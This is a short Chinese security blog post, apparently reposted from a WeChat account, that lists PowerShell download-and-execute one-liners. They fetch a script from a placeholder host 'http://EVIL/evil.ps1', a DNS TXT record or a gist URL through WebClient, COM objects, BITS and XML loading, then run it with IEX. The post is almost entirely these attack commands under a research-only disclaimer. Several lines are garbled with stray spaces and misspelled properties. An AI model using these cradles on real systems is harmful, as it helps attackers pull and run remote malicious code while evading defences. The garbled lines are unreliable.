普通下载
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
隐藏的IE com对象
$ie=New-Object -comobject InternetExplorer.Application;
$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');
start-sleep -s 5;
$r=$ie.Document.body.innerHTML;
$ie.quit();
IEX $r
Msxml2.XMLHTTP COM对象
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://EVIL/evil.ps1',$false);
$h.send();
iex $h.responseText
WinHttp COM对象(不识别代理!)
$ h = new-object -com WinHttp.WinHttpRequest.5.1;
$ h.open('GET',' http://EVIL/evil.ps1',$false);
$ h.send();
iex $ h.qesponseText
使用bitstransfer
Import-Module bitstransfer;
Start-BitsTransfer'http ://EVIL/evil.ps1'$ env:temp t;
$ r = gc $ env:temp t; rm $ env:tempt;
iex $ r
PowerBreach的DNS TXT方法
要执行的代码必须是存储在TXT记录中的base64编码的字符串
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
<#
"1.0" xml version=
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
本文始发于微信公众号(黑白天实验室):一些有趣的powershell加载命令
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论